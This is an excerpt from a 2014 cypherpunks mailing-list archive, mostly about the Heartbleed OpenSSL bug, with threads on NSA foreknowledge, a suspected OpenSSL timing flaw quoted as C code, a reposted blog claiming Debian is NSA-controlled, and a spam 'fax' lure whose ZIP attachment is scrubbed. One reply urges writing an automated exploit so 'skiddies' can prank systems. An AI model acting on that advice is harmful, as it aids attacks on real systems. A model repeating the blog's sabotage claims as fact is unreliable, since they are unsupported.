be achieved? I hear a > > lot of anarchists saying what you say and it's a fantastic goal. But > > how do we get there? > > > > > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3279 bytes Desc: not available URL: From jamesdbell9 at yahoo.com Tue Apr 8 23:25:12 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Tue, 8 Apr 2014 23:25:12 -0700 (PDT) Subject: Passwords problem Message-ID: <1397024712.68961.YahooMailNeo@web126203.mail.ne1.yahoo.com> http://news.yahoo.com/passwords-vulnerable-security-flaw-found-222708914.html Passwords vulnerable after security flaw found   By ANICK JESDANUN 6 hours ago * * * * * * * NEW YORK (AP) — Passwords, credit cards and other sensitive data are at risk after security researchers discovered a problem with an encryption technology used to securely transmit email, e-commerce transactions, social networking posts and other Web traffic. Related Stories * 'Heartbleed' bug in web technology seen as major threat to user data Reuters * Internet “Heartbleed” Bug Exposing Passwords To Hackers CBS Dallas Fort Worth (RSS) * What You Need to Know About Heartbleed, the New Security Bug Scaring the Internet The Atlantic Wire * 'Heartbleed' bug puts encrypted data in dangerAFP * Google, Microsoft Race to Assess Heartbleed Vulnerability The Wall Street Journal Security researchers say the threat, known as Heartbleed, is serious, partly because it remained undiscovered for more two years. Attackers can exploit the vulnerability without leaving any trace, so anything sent during that time has potentially been compromised. It's not known, though, whether anyone has actually used it to conduct an attack. Researchers are advising people to change all of their passwords. The flaw was discovered independently in recent days by researchers at Google Inc. and the Finnish security firm Codenomicon. The breach involves SSL/TLS, an encryption technology marked by the small, closed padlock and "https:" on Web browsers to signify that traffic is secure. With the Heartbleed flaw, traffic was subject to snooping even if the padlock had been closed. The problem affects only the variant of SSL/TLS known as OpenSSL, but that happens to be one of the most common on the Internet. Researchers at Codenomicon say that OpenSSL is used by two of the most widely used Web server software, Apache and nginx. That means many websites potentially have this security flaw. OpenSSL is also used to secure email, chats and virtual private networks, which are used by employees to connect securely with corporate networks. Despite the worries, Codenomicon said many large consumer sites don't have the problem because of their "conservative choice" of equipment and software. "Ironically smaller and more progressive services or those who have upgraded to (the) latest and best encryption will be affected most," the security firm added. A fix came out Monday, but affected websites and service providers must install the update. Yahoo's Tumblr blogging service uses OpenSSL. In a blog post Tuesday, officials at the service said they had no evidence of any breach and had immediately implemented the fix. "But this still means that the little lock icon (HTTPS) we all trusted to keep our passwords, personal emails, and credit cards safe, was actually making all that private information accessible to anyone who knew about the exploit," Tumblr's blog post read. "This might be a good day to call in sick and take some time to change your passwords everywhere — especially your high-security services like email, file storage, and banking, which may have been compromised by this bug." Yahoo Inc. said its other services, including email, Flickr and search, also have the vulnerability. The company said some of the systems have already been fixed, while work is being done on the rest of Yahoo's websites. The company reiterated its standard recommendation for people to change passwords regularly and to add a backup mobile number to the account. That number can be used to verify a user's identity if there are problems accessing the account because of hacking. ___ AP Technology Writer Michael Liedtke in San Francisco contributed to this report. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 28321 bytes Desc: not available URL: From jamesdbell9 at yahoo.com Tue Apr 8 23:36:31 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Tue, 8 Apr 2014 23:36:31 -0700 (PDT) Subject: healthcare.gov vulnerability? Message-ID: <1397025391.88329.YahooMailNeo@web126205.mail.ne1.yahoo.com> It occurred to me that I haven't heard much on the news about deliberate attacks on the healthcare.gov website, even though it is reputed to be extremely weak.  Might somebody (potentially a supporter of Obama and/or Obamacare) have deliberately 'spammed' it with fake signups, simply to get the number of such signups increased?  How vulnerable would it be to 'invented' names/addresses?  How 'valid' would these names/addresses have to be to keep the system from finding out until some arbitrary stage in the process?  If such an attack had been done, would the public ever find out, and when?         Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 835 bytes Desc: not available URL: From demonfighter at gmail.com Wed Apr 9 05:36:09 2014 From: demonfighter at gmail.com (Steve Furlong) Date: Wed, 9 Apr 2014 08:36:09 -0400 Subject: healthcare.gov vulnerability? In-Reply-To: <1397025391.88329.YahooMailNeo@web126205.mail.ne1.yahoo.com> References: <1397025391.88329.YahooMailNeo@web126205.mail.ne1.yahoo.com> Message-ID: On Wed, Apr 9, 2014 at 2:36 AM, jim bell wrote: > Might somebody (potentially a supporter of Obama and/or Obamacare) have > deliberately 'spammed' it with fake signups, simply to get the number of > such signups increased? Possible, I suppose, but why bother? They could just make up numbers and they'd be repeated as gospel by the lapdogs, lickspittles, and fellow travellers. ref practically every other number coming from the US federal and state governments. -- Neca eos omnes. Deus suos agnoscet. -- Arnaud-Amaury, 1209 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 999 bytes Desc: not available URL: From jamesdbell9 at yahoo.com Wed Apr 9 10:29:19 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Wed, 9 Apr 2014 10:29:19 -0700 (PDT) Subject: healthcare.gov vulnerability? In-Reply-To: References: <1397025391.88329.YahooMailNeo@web126205.mail.ne1.yahoo.com> Message-ID: <1397064559.25249.YahooMailNeo@web126204.mail.ne1.yahoo.com> From: Steve Furlong On Wed, Apr 9, 2014 at 2:36 AM, jim bell wrote:   >> Might somebody (potentially a supporter of Obama and/or Obamacare) have >> deliberately 'spammed' it with fake signups, simply to get the number of >> such signups increased?   >Possible, I suppose, but why bother? They could just make up numbers and they'd be repeated as gospel by the l>apdogs, lickspittles, and fellow travellers. ref practically every other number coming from the US federal and >state governments. True, but I think they'd prefer to (later on) be able to blame some unknown-named and unidentifiable 'hacker-types' than to implicate themselves.   ("I'm shocked, shocked to find that gambling is going on in here!") This tactic wouldn't be useful at all if follow-on data (like actually-paid accounts) were released.  Probably this explains why those numbers remain elusive even today.          Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3715 bytes Desc: not available URL: From Administrator at jfet.org Wed Apr 9 10:36:23 2014 From: Administrator at jfet.org (Administrator) Date: Wed, 9 Apr 2014 12:36:23 -0500 Subject: New Fax: 4 pages Message-ID: Scanned from MFP47815156 by jfet.org Date: Wed, 9 Apr 2014 12:36:23 -0500 Pages: 4 Resolution: 200x200 DPI ---------------------------------------- -------------- next part -------------- A non-text attachment was scrubbed... Name: Scan-510047.ZIP Type: application/zip Size: 6364 bytes Desc: not available URL: From lists at silent1.net Wed Apr 9 15:34:15 2014 From: lists at silent1.net (Silent1) Date: Wed, 9 Apr 2014 23:34:15 +0100 Subject: healthcare.gov vulnerability? In-Reply-To: <1397064559.25249.YahooMailNeo@web126204.mail.ne1.yahoo.com> References: <1397025391.88329.YahooMailNeo@web126205.mail.ne1.yahoo.com> <1397064559.25249.YahooMailNeo@web126204.mail.ne1.yahoo.com> Message-ID: <000701cf5443$d6a42f60$83ec8e20$@net> If they at some later stage got found out to have massaged the data they would just blame it on some office intern who would then be fired and claim it was a statistical fault, politicians only get the where they are by lying, blaming others for their failures, being able to gaslight the public and being able to perform a complete u-turn on a subject and flat out deny it to your face they had done so. Many people forget that politicians have no spine, morals or inclination to tell the truth, especially when the opposite with assist their position. I have no experience of the system, but is it possible to sign a family up with one session, because I can see them easily adjusting it so instead of one signup they've got 5 etc From: cypherpunks [mailto:cypherpunks-bounces at cpunks.org] On Behalf Of jim bell Sent: Wednesday, April 09, 2014 6:29 PM To: Steve Furlong Cc: cypherpunks at cpunks.org Subject: Re: healthcare.gov vulnerability? From: Steve Furlong On Wed, Apr 9, 2014 at 2:36 AM, jim bell wrote: >> Might somebody (potentially a supporter of Obama and/or Obamacare) have >> deliberately 'spammed' it with fake signups, simply to get the number of >> such signups increased? >Possible, I suppose, but why bother? They could just make up numbers and they'd be repeated as gospel by the l>apdogs, lickspittles, and fellow travellers. ref practically every other number coming from the US federal and >state governments. True, but I think they'd prefer to (later on) be able to blame some unknown-named and unidentifiable 'hacker-types' than to implicate themselves. ("I'm shocked, shocked to find that gambling is going on in here!") This tactic wouldn't be useful at all if follow-on data (like actually-paid accounts) were released. Probably this explains why those numbers remain elusive even today. Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 7389 bytes Desc: not available URL: From cypher at cpunk.us Thu Apr 10 00:02:24 2014 From: cypher at cpunk.us (Cypher) Date: Thu, 10 Apr 2014 02:02:24 -0500 Subject: NSA good guys Message-ID: I wonder how long the good but misunderstood people over at NSA knew about Heartbleed and didn't disclose? I mean, certainly "protecting" us would necessitate them coming forward, right? The wouldn't deliberately leave the entire country vulnerable just so the could keep spying, right? Good people, my ass. Cypher Sent from my mobile device From grarpamp at gmail.com Thu Apr 10 00:46:44 2014 From: grarpamp at gmail.com (grarpamp) Date: Thu, 10 Apr 2014 03:46:44 -0400 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <5345917F.3000700@comcast.net> References: <53443999.2090906@gmx.com> <53447721.9070209@gmx.com> <53457BE8.4020500@gmx.com> <5345917F.3000700@comcast.net> Message-ID: On Wed, Apr 9, 2014 at 2:29 PM, Christopher J. Walters > > It makes me wonder if the NSA was involved in inserting this bug into > OpenSSL clients and servers. That would be 2+ years of amazing win on NSA part [1]. Any unlikely impropriety would come out soon. More likely reality... opensource people are busy and good humans and coding mistakes happen. Hopefully the general buzz around NSA/security/crypto/decentral will result dedicating more permanent resource to things like protocol devel and replacements, and auditing of key underlying software code. You really need to be asking if and how the giant for-profit corps that use opensource for free are giving back. $50k a year donated to fund an independant developer pool from the OSS community to sit on the teams of your favorite code projects of choice as auditors is nothing to a companies like that, a dream gig for the dev, a win for project, and good company PR. How often do you see @ge.com @chase.com @ibm.com, etc on developer/donation lists... you need to ask those type of @'s if, how, and why not. [1] And pretty dumb of any attacker to not simply quietly watch, analyse and exploit the committed output of any critical project... no insertion, cost, or risk necessary to do that. From peter at petermalone.org Thu Apr 10 03:40:38 2014 From: peter at petermalone.org (Peter Malone) Date: Thu, 10 Apr 2014 06:40:38 -0400 Subject: Two possible vulnerabilities in OpenSSL? Message-ID: <1397126438.1729.11.camel@shire> Hey there, I was auditing OpenSSL last night. I looked at several files and found the following: https://github.com/openssl/openssl/blob/master/ssl/t1_lib.c#L2893 /* Determine if we need to see RI. Strictly speaking if we want to * avoid an attack we should *always* see RI even on initial server * hello because the client doesn't see any renegotiation during an * attack. However this would mean we could not connect to any server * which doesn't support RI so for the immediate future tolerate RI * absence on initial connect only. */ Well that's awful coding. Unless I'm mistaken, the following memcmp is vulnerable to a remote timing attack. https://github.com/openssl/openssl/blob/master/ssl/ssl_lib.c#L1974 static int ssl_session_cmp(const SSL_SESSION *a,const SSL_SESSION *b) { if (a->ssl_version != b->ssl_version) return(1); if (a->session_id_length != b->session_id_length) return(1); return(memcmp(a->session_id,b->session_id,a->session_id_length)); } I posted both of these findings to the full disclosure list last night. I figured someone on this list might find it interesting as well. Cheers, Peter. From cathalgarvey at cathalgarvey.me Thu Apr 10 03:34:00 2014 From: cathalgarvey at cathalgarvey.me (Cathal Garvey) Date: Thu, 10 Apr 2014 11:34:00 +0100 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: References: <53443999.2090906@gmx.com> <53447721.9070209@gmx.com> <53457BE8.4020500@gmx.com> <5345917F.3000700@comcast.net> Message-ID: <53467398.70004@cathalgarvey.me> > More likely reality... opensource > people are busy and good humans and coding mistakes happen. Given that other likely backdoors were also concealed as "mistakes" in normal commits, I wouldn't write it off. But the real villain here is coding security-critical applications in C, when there are memory-safe, more modern alternatives. The Heartbleed bug-door was a failed memory-bounds check, but that's something more modern alternatives just do automatically as a matter of course. If I recall correctly, Rust was designed explicitly to be memory safe. D is likewise memory safe, and is syntactically close enough to C that an OpenSSL rewrite isn't out of the question. On 10/04/14 08:46, grarpamp wrote: > On Wed, Apr 9, 2014 at 2:29 PM, Christopher J. Walters > >> It makes me wonder if the NSA was involved in inserting this bug into >> OpenSSL clients and servers. > > That would be 2+ years of amazing win on NSA part [1]. Any unlikely > impropriety would come out soon. More likely reality... opensource > people are busy and good humans and coding mistakes happen. > Hopefully the general buzz around NSA/security/crypto/decentral will > result dedicating more permanent resource to things like protocol devel > and replacements, and auditing of key underlying software code. > You really need to be asking if and how the giant for-profit corps > that use opensource for free are giving back. $50k a year donated to > fund an independant developer pool from the OSS community to sit on > the teams of your favorite code projects of choice as auditors is nothing > to a companies like that, a dream gig for the dev, a win for project, and > good company PR. > > How often do you see @ge.com @chase.com @ibm.com, etc > on developer/donation lists... you need to ask those type of > @'s if, how, and why not. > > [1] And pretty dumb of any attacker to not simply quietly watch, > analyse and exploit the committed output of any critical project... > no insertion, cost, or risk necessary to do that. > -- T: @onetruecathal, @IndieBBDNA P: +353876363185 W: http://indiebiotech.com -------------- next part -------------- A non-text attachment was scrubbed... Name: 0x988B9099.asc Type: application/pgp-keys Size: 6176 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 901 bytes Desc: OpenPGP digital signature URL: From tedks at riseup.net Thu Apr 10 10:23:50 2014 From: tedks at riseup.net (Ted Smith) Date: Thu, 10 Apr 2014 13:23:50 -0400 Subject: NSA good guys In-Reply-To: <534691BD.1060904@cathalgarvey.me> References: <534691BD.1060904@cathalgarvey.me> Message-ID: <1397150630.11670.2.camel@anglachel> On Thu, 2014-04-10 at 13:42 +0100, Cathal Garvey wrote: > Anyone have details on whether Lavabit was vulnerable? Because that'd > beg the question; why ask nicely? Even if the FBI knew about Heartbleed, they'd presumably want to use the evidence they gathered from Lavabit to prosecute a case in an open court. They couldn't use illegally gathered evidence in a criminal trial. The NSA and CIA, on the other hand, are military rather than civilian. They don't have to have trials. They have Guantanamo instead. -- Sent from Ubuntu -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: This is a digitally signed message part URL: From dal at riseup.net Thu Apr 10 11:35:01 2014 From: dal at riseup.net (Douglas Lucas) Date: Thu, 10 Apr 2014 13:35:01 -0500 Subject: Assange: Debian is Owned by the NSA In-Reply-To: <2047905.eXV2Ankize@lap> References: <2047905.eXV2Ankize@lap> Message-ID: <5346E455.5050100@riseup.net> Contrary to reports, Assange didn't say Debian is owned by the NSA, but rather that it is easy to backdoor operating systems: https://twitter.com/wikileaks/status/454261872704094208 On 04/10/2014 11:48 AM, rysiek wrote: > Hi there, > > so this has come to my attention. Whaddya guys and gals think? > > - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - > > http://igurublog.wordpress.com/2014/04/08/julian-assange-debian-is-owned-by-the-nsa/ > > > In his Q&A to his keynote address at the World Hosting Days Global 2014 > conference in April, the world’s largest hosting and cloud event, Julian > Assange discussed encryption technology in the context of hosting > systems. He discussed the cypherpunk credo of how encryption can level > the playing field between powerful governments and people, and about 20 > minutes into his address, he discussed how UNIX-like systems like Debian > (which he mentioned by name) are engineered by nation-states with > backdoors which are easily introduced as ‘bugs’, and how the Linux > system depends on thousands of packages and libraries that may be > compromised. > > I recommend watching his 36 minute Q&A in its entirety, keeping in mind > my recent warnings about how GNU/Linux is almost entirely engineered by > the government/military-affiliated Red Hat corporation. > > The Voice of Russia website has an article on Assange’s address with a > few quotes: > > “To a degree this is a matter of national sovereignty. The news is > all flush with talk about how Russia has annexed the Crimea, but the > reality is, the Five Eyes intelligence alliance, principally the United > States, have annexed the whole world as a result of annexing the > computer systems and communications technology that is used to run the > modern world,” stated Julian Assange in his keynote address… > > Don’t just read the short article, listen to the address yourself, > because Assange goes into many areas, and the work being done in these > fields. > > Assange mentions how Debian famously botched the SSL random number > generator for years (which was clearly sabotaged – a known fact). > Speaking of botched security affecting Red Hat, Debian, Ubuntu, Gentoo, > SuSE, *BSD, and more, the nightmarish OpenSSL recently botched SSL again > (very serious – updated comments on how a defense contractor in Finland > outed the NSA here?) It’s very hard to believe this wasn’t deliberate, > as botching the memory space of private keys is about as completely > incompetent as you can get, as this area is ultra-critical to the whole > system. As a result, many private keys, including of providers, were > potentially compromised, and much private info of service users. Be sure > to update your systems as this bug is now public knowledge. (For more on > how OpenSSL is a nightmare, and why this bug is one among many that will > never be found, listen to FreeBSD developer Poul-Heening Kamp’s > excellent talk at the FOSDEM BSD conference.) > > From the start, my revelations on this blog about Red Hat’s deep control > of Linux, along with their large corporate/government connections, > hasn’t been just about spying, but about losing the distributed > engineering quality of Linux, with Red Hat centralizing control. Yet as > an ex-cypherpunk and crypto software developer, as soon as I started > using Linux years ago, I noted that all the major distributions used > watered-down encryption (to use stronger encryption in many areas, such > as AES-loop, you needed to compile your own kernel and go to great > lengths to manually bypass barriers they put in place to the use of > genuinely strong encryption). This told me then that those who > controlled distributions were deeply in the pockets of intelligence > networks. So it comes as no surprise to me that they jumped on board > systemd when told to, despite the mock choice publicized to users – > there was never any option. > > A computer, and especially hosting services (which often run Linux), are > powerful communication and broadcasting systems into today’s world. If > you control and have unfettered access to such systems, you basically > control the world. As Assange notes in the talk, encryption is only as > strong as its endpoints. eg if you’re running a very secure protocol on > a system with a compromised OS, you’re owned. > > As Assange observed: > > “The sharing of information, the communication of free peoples, > across history and across geography, is something that creates, > maintains, and disciplines laws [governments].” > > - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - > From cathalgarvey at cathalgarvey.me Thu Apr 10 05:42:37 2014 From: cathalgarvey at cathalgarvey.me (Cathal Garvey) Date: Thu, 10 Apr 2014 13:42:37 +0100 Subject: NSA good guys In-Reply-To: References: Message-ID: <534691BD.1060904@cathalgarvey.me> Anyone have details on whether Lavabit was vulnerable? Because that'd beg the question; why ask nicely? On 10/04/14 12:44, Lodewijk andré de la porte wrote: > Of course they'd keep it hidden! It'd leak vital information about how they > know about every bug before others do. > > It's also what they've been doing since forever. This was probably a real > gem among their stones. > -- T: @onetruecathal, @IndieBBDNA P: +353876363185 W: http://indiebiotech.com -------------- next part -------------- A non-text attachment was scrubbed... Name: 0x988B9099.asc Type: application/pgp-keys Size: 6176 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 901 bytes Desc: OpenPGP digital signature URL: From l at odewijk.nl Thu Apr 10 04:44:25 2014 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Thu, 10 Apr 2014 13:44:25 +0200 Subject: NSA good guys In-Reply-To: References: Message-ID: Of course they'd keep it hidden! It'd leak vital information about how they know about every bug before others do. It's also what they've been doing since forever. This was probably a real gem among their stones. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 348 bytes Desc: not available URL: From yersinia.spiros at gmail.com Thu Apr 10 06:05:59 2014 From: yersinia.spiros at gmail.com (yersinia) Date: Thu, 10 Apr 2014 15:05:59 +0200 Subject: Two possible vulnerabilities in OpenSSL? In-Reply-To: <1397126438.1729.11.camel@shire> References: <1397126438.1729.11.camel@shire> Message-ID: On Thu, Apr 10, 2014 at 12:40 PM, Peter Malone wrote: > Hey there, > > I was auditing OpenSSL last night. I looked at several files and found > the following: > > https://github.com/openssl/openssl/blob/master/ssl/t1_lib.c#L2893 > /* Determine if we need to see RI. Strictly speaking if we want to > * avoid an attack we should *always* see RI even on initial server > * hello because the client doesn't see any renegotiation during an > * attack. However this would mean we could not connect to any server > * which doesn't support RI so for the immediate future tolerate RI > * absence on initial connect only. > */ > > Well that's awful coding. > > Unless I'm mistaken, the following memcmp is vulnerable to a remote > timing attack. > https://github.com/openssl/openssl/blob/master/ssl/ssl_lib.c#L1974 > static int ssl_session_cmp(const SSL_SESSION *a,const SSL_SESSION *b) > { > if (a->ssl_version != b->ssl_version) > return(1); > if (a->session_id_length != b->session_id_length) > return(1); > return(memcmp(a->session_id,b->session_id,a->session_id_length)); > } > > I posted both of these findings to the full disclosure list last night. > I figured someone on this list might find it interesting as well. Yes, I had noticed your post on FD. In my opinion you are right, the value that is compared can come from the outside. It would be the same problem that is discussed (also) here. Perhaps the solution might look like the same. https://trac.torproject.org/projects/tor/ticket/3122 thanks Best regards > > Cheers, > Peter. > From tpb-crypto at laposte.net Thu Apr 10 06:16:26 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Thu, 10 Apr 2014 15:16:26 +0200 Subject: Two possible vulnerabilities in OpenSSL? In-Reply-To: <1397126438.1729.11.camel@shire> References: <1397126438.1729.11.camel@shire> Message-ID: <1198250046.208428.1397135786224.JavaMail.www@wwinf8311> > Message du 10/04/14 13:11 > De : "Peter Malone" > A : "cypherpunks at cpunks.org" > Copie à : > Objet : Two possible vulnerabilities in OpenSSL? > > Hey there, > > I was auditing OpenSSL last night. I looked at several files and found > the following: > > https://github.com/openssl/openssl/blob/master/ssl/t1_lib.c#L2893 > /* Determine if we need to see RI. Strictly speaking if we want to > * avoid an attack we should *always* see RI even on initial server > * hello because the client doesn't see any renegotiation during an > * attack. However this would mean we could not connect to any server > * which doesn't support RI so for the immediate future tolerate RI > * absence on initial connect only. > */ > > Well that's awful coding. > > Unless I'm mistaken, the following memcmp is vulnerable to a remote > timing attack. > https://github.com/openssl/openssl/blob/master/ssl/ssl_lib.c#L1974 > static int ssl_session_cmp(const SSL_SESSION *a,const SSL_SESSION *b) > { > if (a->ssl_version != b->ssl_version) > return(1); > if (a->session_id_length != b->session_id_length) > return(1); > return(memcmp(a->session_id,b->session_id,a->session_id_length)); > } > > I posted both of these findings to the full disclosure list last night. > I figured someone on this list might find it interesting as well. > > Cheers, > Peter. > > Your best bet would be to make an automated exploit for proof-of-concept. If it allows skiddies to prank systems, people will rush to correct it and your name will be in the headlines for your 15 minutes of fame. From juan.g71 at gmail.com Thu Apr 10 12:26:46 2014 From: juan.g71 at gmail.com (Juan Garofalo) Date: Thu, 10 Apr 2014 16:26:46 -0300 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: References: <53443999.2090906@gmx.com> <53447721.9070209@gmx.com> <53457BE8.4020500@gmx.com> <5345917F.3000700@comcast.net> Message-ID: --On Thursday, April 10, 2014 3:46 AM -0400 grarpamp wrote: > On Wed, Apr 9, 2014 at 2:29 PM, Christopher J. Walters > > >> It makes me wonder if the NSA was involved in inserting this bug into >> OpenSSL clients and servers. > > That would be 2+ years of amazing win on NSA part [1]. Any unlikely > impropriety would come out soon. More likely reality... opensource > people are busy and good humans and coding mistakes happen. Oh. And what about the constant babbling stating that open source is oh-so-great security-wise because lots of people can look at the code bla bla bla bla bla. Bla! > Hopefully the general buzz around NSA/security/crypto/decentral will > result dedicating more permanent resource to things like protocol devel > and replacements, and auditing of key underlying software code. > You really need to be asking if and how the giant for-profit corps > that use opensource for free are giving back. $50k a year donated to > fund an independant developer pool from the OSS community to sit on > the teams of your favorite code projects of choice as auditors is nothing > to a companies like that, a dream gig for the dev, a win for project, and > good company PR. > > How often do you see @ge.com @chase.com @ibm.com, etc > on developer/donation lists... you need to ask those type of > @'s if, how, and why not. > > [1] And pretty dumb of any attacker to not simply quietly watch, > analyse and exploit the committed output of any critical project... > no insertion, cost, or risk necessary to do that. > From juan.g71 at gmail.com Thu Apr 10 13:42:57 2014 From: juan.g71 at gmail.com (Juan Garofalo) Date: Thu, 10 Apr 2014 17:42:57 -0300 Subject: NSA good guys In-Reply-To: <534691BD.1060904@cathalgarvey.me> References: <534691BD.1060904@cathalgarvey.me> Message-ID: --On Thursday, April 10, 2014 1:42 PM +0100 Cathal Garvey wrote: > Anyone have details on whether Lavabit was vulnerable? Because that'd > beg the question; why ask nicely? To cover their tracks? > > On 10/04/14 12:44, Lodewijk andré de la porte wrote: >> Of course they'd keep it hidden! It'd leak vital information about how >> they know about every bug before others do. >> >> It's also what they've been doing since forever. This was probably a real >> gem among their stones. >> > > -- > T: @onetruecathal, @IndieBBDNA > P: +353876363185 > W: http://indiebiotech.com > From pc at loom.cc Thu Apr 10 14:59:49 2014 From: pc at loom.cc (Patrick Chkoreff) Date: Thu, 10 Apr 2014 17:59:49 -0400 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <2853647.cGAsq4hNKP@lap> References: <2853647.cGAsq4hNKP@lap> Message-ID: <53471455.9010801@loom.cc> rysiek wrote, On 04/10/2014 04:08 PM: > Dnia czwartek, 10 kwietnia 2014 16:26:46 Juan Garofalo pisze: >> --On Thursday, April 10, 2014 3:46 AM -0400 grarpamp >> >> Oh. And what about the constant babbling stating that open source >> is oh-so-great security-wise because lots of people can look at >> the code bla bla bla bla bla. Bla! > > Well, they can. Doesn't mean they do. Time to get the message out > there: "start bloody looking at the code". And time to start building from source, examining source diffs, and devising one's own stress tests. -- Patrick From rysiek at hackerspace.pl Thu Apr 10 09:46:48 2014 From: rysiek at hackerspace.pl (rysiek) Date: Thu, 10 Apr 2014 18:46:48 +0200 Subject: NSA good guys In-Reply-To: <534691BD.1060904@cathalgarvey.me> References: <534691BD.1060904@cathalgarvey.me> Message-ID: <11645203.rQrtEU9tSh@lap> Dnia czwartek, 10 kwietnia 2014 13:42:37 Cathal Garvey pisze: > Anyone have details on whether Lavabit was vulnerable? Because that'd > beg the question; why ask nicely? Isn't it obvious? To hide the fact of knowing about it. To be able to use it on other people/organisations. Duh. -- Pozdr rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From rysiek at hackerspace.pl Thu Apr 10 09:48:21 2014 From: rysiek at hackerspace.pl (rysiek) Date: Thu, 10 Apr 2014 18:48:21 +0200 Subject: Assange: Debian is Owned by the NSA Message-ID: <2047905.eXV2Ankize@lap> Hi there, so this has come to my attention. Whaddya guys and gals think? - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://igurublog.wordpress.com/2014/04/08/julian-assange-debian-is-owned-by-the-nsa/ In his Q&A to his keynote address at the World Hosting Days Global 2014 conference in April, the world’s largest hosting and cloud event, Julian Assange discussed encryption technology in the context of hosting systems. He discussed the cypherpunk credo of how encryption can level the playing field between powerful governments and people, and about 20 minutes into his address, he discussed how UNIX-like systems like Debian (which he mentioned by name) are engineered by nation-states with backdoors which are easily introduced as ‘bugs’, and how the Linux system depends on thousands of packages and libraries that may be compromised. I recommend watching his 36 minute Q&A in its entirety, keeping in mind my recent warnings about how GNU/Linux is almost entirely engineered by the government/military-affiliated Red Hat corporation. The Voice of Russia website has an article on Assange’s address with a few quotes: “To a degree this is a matter of national sovereignty. The news is all flush with talk about how Russia has annexed the Crimea, but the reality is, the Five Eyes intelligence alliance, principally the United States, have annexed the whole world as a result of annexing the computer systems and communications technology that is used to run the modern world,” stated Julian Assange in his keynote address… Don’t just read the short article, listen to the address yourself, because Assange goes into many areas, and the work being done in these fields. Assange mentions how Debian famously botched the SSL random number generator for years (which was clearly sabotaged – a known fact). Speaking of botched security affecting Red Hat, Debian, Ubuntu, Gentoo, SuSE, *BSD, and more, the nightmarish OpenSSL recently botched SSL again (very serious – updated comments on how a defense contractor in Finland outed the NSA here?) It’s very hard to believe this wasn’t deliberate, as botching the memory space of private keys is about as completely incompetent as you can get, as this area is ultra-critical to the whole system. As a result, many private keys, including of providers, were potentially compromised, and much private info of service users. Be sure to update your systems as this bug is now public knowledge. (For more on how OpenSSL is a nightmare, and why this bug is one among many that will never be found, listen to FreeBSD developer Poul-Heening Kamp’s excellent talk at the FOSDEM BSD conference.) From the start, my revelations on this blog about Red Hat’s deep control of Linux, along with their large corporate/government connections, hasn’t been just about spying, but about losing the distributed engineering quality of Linux, with Red Hat centralizing control. Yet as an ex-cypherpunk and crypto software developer, as soon as I started using Linux years ago, I noted that all the major distributions used watered-down encryption (to use stronger encryption in many areas, such as AES-loop, you needed to compile your own kernel and go to great lengths to manually bypass barriers they put in place to the use of genuinely strong encryption). This told me then that those who controlled distributions were deeply in the pockets of intelligence networks. So it comes as no surprise to me that they jumped on board systemd when told to, despite the mock choice publicized to users – there was never any option. A computer, and especially hosting services (which often run Linux), are powerful communication and broadcasting systems into today’s world. If you control and have unfettered access to such systems, you basically control the world. As Assange notes in the talk, encryption is only as strong as its endpoints. eg if you’re running a very secure protocol on a system with a compromised OS, you’re owned. As Assange observed: “The sharing of information, the communication of free peoples, across history and across geography, is something that creates, maintains, and disciplines laws [governments].” - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -- Pozdr rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From peter at petermalone.org Thu Apr 10 17:06:12 2014 From: peter at petermalone.org (Peter Malone) Date: Thu, 10 Apr 2014 20:06:12 -0400 Subject: Two possible vulnerabilities in OpenSSL? In-Reply-To: <1198250046.208428.1397135786224.JavaMail.www@wwinf8311> References: <1397126438.1729.11.camel@shire> <1198250046.208428.1397135786224.JavaMail.www@wwinf8311> Message-ID: <1397174772.1729.44.camel@shire> It's no longer implemented in OpenSSL, however some of the versions which were not vulnerable to Heartbleed are impacted. Also the latest version of Ruby and Android implement it. https://android.googlesource.com/platform/external/openssl/+/android-4.4.2_r2/ssl/ssl_lib.c On Thu, 2014-04-10 at 15:16 +0200, tpb-crypto at laposte.net wrote: > > > Message du 10/04/14 13:11 > > De : "Peter Malone" > > > A : "cypherpunks at cpunks.org" > > Copie à : > > Objet : Two possible 